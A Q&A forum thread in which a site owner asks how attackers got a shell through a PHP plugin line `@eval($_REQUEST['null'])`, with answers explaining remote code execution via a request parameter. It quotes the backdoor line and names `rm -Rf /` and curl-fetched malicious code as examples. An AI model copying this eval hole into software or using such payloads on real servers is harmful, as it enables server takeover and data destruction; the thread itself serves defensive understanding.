# Shelled through I think eval() code

Tags: php, eval

Recently we've been shelled by someone who I am not aware of.
I've checked all the logs and the only thing I could find was a file from a plugin that could possibly have the flaw, after he POSTed to this URL, he had access to the uploaded file, which indeed was a shell.

I am suspecting that this line of code is causing the issue.

```
(isset($_REQUEST['null']) ? @eval($_REQUEST['null']) : null);
```

Could anyone explain to me how someone would shell through this? I'm really curious how he did it, so I can also spit through the other plugins for bad codes like this. They basicily uploaded a file from this. Maybe `file_put_contents()` or an actual POST request with an image?

I'm not familiair with hacking, I've also never used eval as I heard that it in fact is an evil function.
Also please note that I will NOT use this to hack other sites, I just wanna understand what's going on here.

Comment: http://php.net/manual/en/function.eval.php

Comment: Possible duplicate of [Execute PHP code in a string](http://stackoverflow.com/questions/10866301/execute-php-code-in-a-string)

Answer (score 1, accepted):

By issuing a request like this

```
http://yourdomain.com/file.php?null=PHP_PAYLOAD
```

Because of eval, the PHP_PAYLOAD, will be evaluated/executed.

The payload can be anything that's valid php, for example writing new files, downloading them on the server, running shell commands via `shell_exec`.

**any** valid php code would be executed.

Answer (score 1):

That's a **BIG** flaw! You can pass a whole PHP script (via POST) and it will be executed on your server.

Picture a PHP code that uses curl (http://php.net/curl) to download any other malicious code into your server.

Or you can just send a `rm -Rf /` and say goodbye to your filesystem...